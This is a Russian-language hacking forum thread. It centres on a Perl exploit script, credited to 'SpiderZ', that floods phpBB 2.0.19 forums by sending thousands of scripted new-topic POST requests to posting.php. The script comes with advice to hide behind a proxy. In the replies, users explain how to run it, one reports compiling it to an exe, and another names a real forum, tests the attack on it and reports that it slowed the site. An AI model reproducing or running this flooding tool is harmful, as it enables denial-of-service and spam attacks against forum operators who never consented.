Форумы exploit phpBB 2.0.19 ( by SpiderZ )

работает отлично!

Code:

#!/usr/bin/perl 

print q{ 
_________________________________________________________________________ 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>| 

           /      \ 
        \  \  ,,  /  / 
         '-.`\()/`.-' 
        .--_'(  )'_--. 
       / /` /`""`\ `\ \           * SpiderZ ForumZ Security * 
        |  |  ><  |  | 
        \  \      /  / 
            '.__.'        


=> Exploit phpBB 2.0.19 ( by SpiderZ ) 
=> Topic infinitely exploit 
=> Sito: www.spiderz.tk 

_________________________________________________________________________ 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>| 

}; 

use IO::Socket; 

## Initialized X 
$x = 0; 

## Exploit phpbb 2.0.19 SpiderZ 
print q( 
Exploit phpBB 2.0.19 ( by SpiderZ ) 

); 
print q( 
=> Scrivi l'url del sito senza aggiungere http & www 
=> Url: ); 
$host = <STDIN>; 
chop ($host); 

print q( 
=> Adesso indica in quale cartella e posto il phpbb 
=> di solito si trova su /phpBB2/ o /forum/ 
=> Cartella: ); 
$pth = <STDIN>; 
chop ($pth); 

print q( 
=> Occhio usa un proxy prima di effettuare l'attacco 
=> il tuo ip verra spammato sul pannello admin del forum 
=> Per avviare l'exploit scrivi " hacking " 
=> ); 
$type = <STDIN>; 
chop ($type); 

## Search exploit phpbb by SpiderZ 
if($type == 1){ 

## Search exploit phpbb by SpiderZ 
while($x != 0000) 
{ 

## Search exploit phpbb by SpiderZ 
$x++; 
} 

## Nome attack Hacking 
} 
elsif ($type == hacking){ 

## Search exploit phpbb by SpiderZ 
while($x != 10000) 
{ 
## Invia Search exploit phpbb by SpiderZ 
$postit = "post=Hacking$x+&username=Exploit&subject=Exploit_phpbb_2.0.19&message=Topic infinitely exploit phpBB 2.0.19"; 

## Posit Length 
$lrg = length $postit; 

## Connect Socket with Variables Provided By User 
my $sock = new IO::Socket::INET ( 
                                 PeerAddr => "$host", 
                                 PeerPort => "80", 
                                 Proto => "tcp", 
                                ); 
die "\nConnessione non riuscita: $!\n" unless $sock; 

## Invia Search exploit phpbb by SpiderZ 
print $sock "POST $pth"."posting.php?mode=newtopic&f=1 HTTP/1.1\n"; 
print $sock "Host: $host\n"; 
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; 
print $sock "Referer: $host\n"; 
print $sock "Accept-Language: en-us\n"; 
print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
print $sock "Content-Length: $lrg\n\n"; 
print $sock "$postit\n"; 
close($sock); 

## exploit phpbb by SpiderZ 
syswrite STDOUT, "."; 

## exploit phpbb by SpiderZ 
$x++; 
} 
}else{ 

## Error Exploit phpbb 
   die " 
Error ! riprova... 
\n"; 
} 

 

Насколько я понял-флудер простенький...

 

у меня не работает....

 

да и толку от него ? аналогов да е**** мени

 

не работает у меня и что делать , если стоит запрет время ввода сообщений каждый 10 минут например!

 

thanksss

 

Ну да я ламо..ну объясните плз как его использовать поподробнее...забил понимаешь на хакинг и на те..уже нихера не понимаю)))эх...раньше всё попороще было)))

 

во времена счётной машинки паскаля
базаров нет

 

video нужнa ?

 

не...уже вроде вкурил чё и как

 

Эксплоит работает, но осталась пара вопросов. Например, за что отвечает секция

Code:

print q( 
=> Occhio usa un proxy prima di effettuare l'attacco 
=> il tuo ip verra spammato sul pannello admin del forum 
=> Per avviare l'exploit scrivi " hacking " 
=> ); 
$type = <STDIN>; 
chop ($type);

 

народ, как рубить, так и не вкурил
запустил сплой
в 1ом меню че вписывать?
допустим сайт forum.site.ru
в первом пишу: "forum.site.ru"
вторая строчка: "/"
третья - это ваще че?
обьясните ученику

 

Ненавижу сплоеты от пауков, т.к. все указания на узбекском, хрен проссыш что надо.
Объясните чё они спрашивают при запуске своих сплоетов? Например этого

 

Трудно понять по скрипту?
1. вводите сервак без http, www и /
2. вводите директорию форума в виде /dir/. Если её нет, то просто /
3. это хрень какая-то. Может принимать значения 1 или hacking. Проверены оба - форум падает.

Я его откомпилировал в exe и русифицировал. Ржачная штука...

 

Всё сделал как ты сказал. В результате ноль реакции.
просто появляется новая командная строка вида D:\Perl\bin> и всё. Ноль реакции

А вообще сколько времени занимает работа сплоита?

 

Уверен ли ты, что атакуемый форум уязвим? (Если можно - ссылку)
Время работы зависит от разных факторов (например, скорости сети). Пока он работает, в консоли бегает ряд точек. Окончив работу, скрипт закрывается (В случае невозможности подключения - тоже). Сейчас проверил: Насчёт пункта 3 я накосячил. У меня с 1 этот скрипт вылетел, а hacking должен сработать. Пробуй!

 

гм... если я не ошибаюсь: вывод на экран заданного текста, присвоение переменной значения, введенного пользователем и урезание последнего введенного символа соответственно) (т.е. "/n")

или вопрос был про $type?

тогда извиняюсь, туплю)

здесь пишется про что-то, связанное с прокси.. язык итальянский, перевод с транслэйта:

 

Сцылка - http://game.aaanet.ru/forum/
При вводе слова хакинг просто стоит картинка, курсор мигает. И всё. И так минут 20. Под конец с матом вырубаю

 

Проверил на 128 кб/с (валить не стал, сбросил). Да, периодически курсор останавливается, потом продолжает. И так "этапами". Потом пытался войти на форум - он тормознул заметно. Значит, сработало. Вводил так:
1. game.aaanet.ru
2. /forum/
3. hacking

Burned, спасибо. Я искал только смысл упомянутой фигни.

 

Да